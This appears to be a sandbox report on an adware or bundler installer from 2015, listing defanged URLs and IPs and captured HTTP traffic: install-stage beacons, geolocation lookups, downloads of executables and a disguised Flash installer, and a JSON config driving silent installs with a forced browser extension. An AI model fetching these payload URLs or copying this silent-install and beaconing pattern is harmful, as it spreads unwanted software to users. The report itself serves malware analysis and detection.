hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
hxxp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe | 216.137.61.180 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632 | |
hxxp://drz432f7yeokb.cloudfront.net/SilentInstaller_dotnet4.exe | 216.137.61.180 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473 | |
hxxp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792 | |
hxxp://djapp.info/?file=flash | |
hxxp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe | 216.137.61.58 |
hxxp://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn&os=win&arch=x86&nacl_arch=x86-32&prod=chromiumcrx&prodchannel=unknown&prodversion=45.0.2433.0&lang=en-US&x=id=pcjnhdkacfipfoicilllfabpbghiegpn&v=0.0.0.0&uc | 108.59.81.209 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775 | 54.231.1.148 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.42 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065 | 54.231.1.148 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707 | 54.231.1.148 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473 | 54.231.1.148 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429 | 54.231.12.132 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792 | 69.16.175.42 |
hxxp://events.lxhwspv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= | |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804 | 54.231.1.148 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.42 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.42 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk= | 95.211.189.16 |
hxxp://err.rgbdomsrv.com/utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906 | 54.231.1.148 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632 | 54.231.1.148 |
hxxp://www.djapp.info/?file=flash | 52.1.45.42 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.42 |
hxxp://www.djapp.info/?file=bundle&v=2 | 52.1.45.42 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 95.211.189.16 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474 | 69.16.175.42 |
hxxp://dl.randkeygen.com/crcb/123/installer.exe | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733 | 54.231.1.148 |
d20ssor9owizgr.cloudfront.net | 216.137.61.211 |
www.google.com | 173.194.113.209 |
s3.amazonaws.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=35167
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop018.am4.t,1446103867.cds046.am4.c
<<< skipped >>>
GET /extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn&os=win&arch=x86&nacl_arch=x86-32&prod=chromiumcrx&prodchannel=unknown&prodversion=45.0.2433.0&lang=en-US&x=id=pcjnhdkacfipfoicilllfabpbghiegpn&v=0.0.0.0&uc HTTP/1.1
Host: ext.internetquickaccess.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2433.0 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:32:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.28-1~dotdeb 7.1
Content-Encoding: gzip
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:02 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441951687"
Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT
Cache-Control: max-age=905
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1446103863.dop004.fr7.t,1446103862.cds030.fr7.c
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=35166
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop001.am4.t,1446103867.cds046.am4.c
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: owm0A2VwZ fAFZKdHlPUMgyuVXafcVEThIOwANcVoEmR4HNOqR6N29k/X6 4LTFJ
x-amz-request-id: 2E1F56F7DA07770A
Date: Thu, 29 Oct 2015 07:31:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: P1UZDwwwBu7nUGDwaryzAhOZ9BlDOflYpb4RhLXY8AFbo0blfvjlHLos7XemjSBb
x-amz-request-id: 895C0BB43350E31C
Date: Thu, 29 Oct 2015 07:31:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ubBXAo6TlDsVKZu70Xqt5Z pbJvHGa1nD4h0k1clEbbm39oJgJpdMS59P9xZNFka
x-amz-request-id: 3F474E13F6253A81
Date: Thu, 29 Oct 2015 07:31:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: k5bIf0I8TsFZu J4ql XPkz4iMrFrbXgTVyem4Nq5fEqJZ9 b7w5MzJAeIerNVm
x-amz-request-id: 2A77CADFFF654825
Date: Thu, 29 Oct 2015 07:31:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: DrXGQoHGwzJzstNg10GkQJOXoTxcA0kmD9Uy7IWiu8IrGMhj FxIyDNsgGpKFSDa
x-amz-request-id: 62CE6D9C1696D2F3
Date: Thu, 29 Oct 2015 07:31:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: lqhArZ1TfN8lUqnsY33ZPSOGfeAgDIZt5o3UgT9O1rvunQlFrqBaMnKOdZdGb64U
x-amz-request-id: FB65CBCBA2565DE4
Date: Thu, 29 Oct 2015 07:31:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: za9H2ePsoFOFOZZcW5s9M9khdLE0lUf05xcASPNTsTzfIXwApo5R8pSioe0oJgDE
x-amz-request-id: 37D13C07C962DD49
Date: Thu, 29 Oct 2015 07:31:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:05 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:54 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 121
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:54 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:59 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:59 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:59 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:05 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:05 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 173
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.randkeygen.com/crcb/123/installer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:07 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:09 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:10 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:10 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:14 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=35168
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop019.am4.t,1446103867.cds064.am4.c
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=35172
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop019.am4.t,1446103867.cds035.am4.c
<<< skipped >>>
GET /iqa/install_flash_player_ppapi.exe HTTP/1.1
Host: d22nes4susdva1.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 19198128
Connection: keep-alive
Date: Sat, 05 Sep 2015 01:26:25 GMT
Last-Modified: Tue, 11 Aug 2015 10:54:00 GMT
ETag: "c3f3ae94549aa626ea751c5e64e6314c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 53613
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 4haewE7Av09soC0H4UNI-pzRODloIPaxcgeGugAf-m3jYZj5iUczpg==
<<< skipped >>>
GET hXXp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en HTTP/1.1
Host: json.lxhwspv.com
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:35:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
373
{
"advID":128,
"primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe",
"secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe",
"requireUnzip":false,
"requireSuccessInstallCheck":true,
"requireExitCodeCheck":false,
"successExitCode":0,
"constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",
"mappedParams":[],
"requireRegKeysCheck":true,
"regKeysToCheck":[
"LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",
"LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"
],
"minutesToSleepBeforeInstall":0,
"preInstallRegCheck": true,
"preInstallRegKeys": [
"LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",
"LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"
],
"blockIfInstalled" : false
}
0
<<< skipped >>>
GET /?file=flash HTTP/1.1
Host: VVV.djapp.info
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 29 Oct 2015 07:36:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
